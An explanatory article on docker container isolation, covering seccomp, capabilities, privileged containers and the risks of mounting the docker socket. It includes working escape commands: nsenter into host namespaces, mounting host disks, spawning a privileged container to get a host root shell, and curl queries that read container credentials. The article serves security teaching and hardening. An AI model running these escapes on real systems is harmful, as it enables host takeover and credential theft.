Breaking out of docker containers

Containers have replaced virtual machines for many workloads, providing a lightweight but still isolated execution environment for deployments from development to production. But while these technologies look and feel similar in many regards, they are very different under the hood.

Containers aren't virtual machines

Before containers became popular, virtual machines were used for many tasks that docker has since taken over. In many cases, containers are effectively a lightweight replacement for virtual machines, with faster start times, less overhead and easier management. But while these technologies look and feel similar to an operator, they are very different internally: virtual machines virtualize an entire operating system, complete with emulated hardware and a separate kernel, while containers share the host kernel and only apply isolation mechanisms on top, like confining each container to its own process and network namespaces. Containers cannot see processes, network interfaces or devices outside of their namespaces, boxing them into their own little virtual environment.
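You can see this isolation firsthand, assuming a local docker installation: inside a container's PID namespace, the container's first process is PID 1, just like init on a full system.

docker run --rm debian sh -c 'echo $$'

This prints 1, while the same command on the host prints an ordinary process ID.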

But sharing a kernel with the host obviously comes with some hefty drawbacks. To ensure containers cannot easily use kernel calls to escape their environment, a default seccomp profile filters out potentially dangerous system calls, while apparmor/selinux policies prevent direct access to risky filesystem paths like /dev, /proc and /sys.
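A minimal demonstration of the seccomp filter, assuming the default profile is active: creating a new user namespace from inside a container is denied.

docker run --rm debian unshare --user --map-root-user whoami

unshare: unshare failed: Operation not permitted

Disabling the profile with --security-opt seccomp=unconfined typically makes the same call succeed, which is exactly why these protections should stay enabled.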

But if the host kernel is exploitable, a compromised container quickly leads to a compromised host machine. No amount of protection can guarantee safety against exploits of this nature if they happen to work without making any of the restricted kernel calls. Some risk remains, even in a perfectly configured environment.

Privileged containers aren't what you think

Docker containers restrict the use of some features that could be dangerous to the host or compromise the isolation of the container. This default behavior can be adjusted as necessary by giving the container special "linux capabilities", for example CAP_SYS_MODULE to allow loading kernel modules, or CAP_SYS_ADMIN for administrative tasks like mounting filesystems, setting disk quotas or setting up loop devices (run man 7 capabilities for a list of all possible options).

A container can be given these capabilities with the --cap-add= flag:

docker run --rm -it --cap-add=CAP_SYS_ADMIN debian bash
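Inside this container, operations gated on CAP_SYS_ADMIN start working, for example mounting a tmpfs (a sketch assuming the default seccomp profile, which permits mount once the capability is present; on hosts enforcing the docker-default apparmor profile you may additionally need --security-opt apparmor=unconfined):

mount -t tmpfs none /mnt

Without the added capability, the same command fails with a permission error.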

Many users assume that running a container with the --privileged flag simply grants it all capabilities, but there is a different flag for that: --cap-add=ALL. So what is a privileged container then? It is a container that has all capabilities, but additionally disables the seccomp and apparmor/selinux protections and mounts the host's /dev directory into the container. In practice, this means the container no longer has any meaningful security mechanism isolating it from the host. It can access every host drive by mounting it from /dev, so it can read and write the host filesystem at will. Removing the seccomp and apparmor protections also means that a process within the container can easily switch out of the container's namespaces into the host's, and effectively run any program it likes on the host machine:

Start an interactive container:

docker run --rm -it --privileged debian bash

Then simply switch to the host's namespace:

nsenter --target 1 --mount --uts --ipc --net --pid

And just like that, you can now freely start processes on the host system, outside of the container. Privileged containers throw away all the protection that containers provided in the first place; running one is like running its contents directly on the host system as root.
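The /dev access mentioned above is just as direct. A sketch, assuming the host's root filesystem lives on /dev/sda1:

mount /dev/sda1 /mnt

The host's root filesystem is now readable and writable under /mnt inside the container.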

Mounting the docker socket into containers

Some applications have started offering native integrations with the docker socket to automate workflows. The traefik reverse proxy, for example, can watch the docker socket for new containers and automatically set up reverse proxy configurations based on container labels. This drastically simplifies the workflow for hosting containers at scale, but it also means that the traefik process needs access to the docker socket.
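In such a setup, the socket is typically bind-mounted into the container, along the lines of (omitting the usual traefik configuration):

docker run -d -v /var/run/docker.sock:/var/run/docker.sock traefik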

Most deployments run traefik in a container just like the other applications, but giving it access to the docker socket effectively removes the security benefits of containers entirely. If the application has a vulnerability, an attacker can use the mounted docker socket to spawn a privileged container and escape through it onto the host system.
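To illustrate, a sketch of such an escape, assuming the attacker has a shell in the compromised container and a docker CLI available inside it: the mounted socket lets them start a fresh privileged container with the host's root filesystem bind-mounted, then chroot into it.

docker -H unix:///var/run/docker.sock run --rm -it --privileged -v /:/host debian chroot /host sh

This drops them into a root shell on the host's filesystem, from which taking over the host is trivial.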

Mounting the docker socket is always risky, and potentially provides complete access to the host machine. Mounting it read-only (add :ro to the end of the mount) helps less than you might expect: the flag only prevents filesystem operations like deleting or replacing the socket file, while connecting to it and sending API requests, including ones that run or change containers, still works, because talking to a socket is not a filesystem write. Actually limiting what the container can do requires a filtering proxy in front of the socket. And even if an attacker only reads from the API, that alone provides a LOT of information: containerized applications requiring credentials (admin dashboards, databases, fileservers, ...) typically receive those through environment variables, and read access to the docker API is all an attacker needs to extract them and escalate into other containers.
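For example, assuming curl is available inside the container (the container name here is hypothetical), two API calls suffice:

curl --unix-socket /var/run/docker.sock http://localhost/containers/json

curl --unix-socket /var/run/docker.sock http://localhost/containers/my-database/json

The second response includes Config.Env, complete with any credentials that were passed as environment variables.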

Does that make containers bad?

No. Containers are a great way for most deployments to strike a balance between performance and isolation, and they can be safely used in production environments. That being said, they aren't perfect: sharing a kernel with the host machine leaves some attack surface, and privileged containers or bind-mounted privileged resources can quickly undo their isolation.

Containers aren't intended or suitable for bulletproof isolation; that's still the job of virtual machines. Some newer technologies have emerged to fill that gap, like Kata Containers or the movement towards rootless containers in docker/podman. But understanding how the security and isolation mechanisms of containers work is still necessary to judge the risk you expose your machines to by running containers.
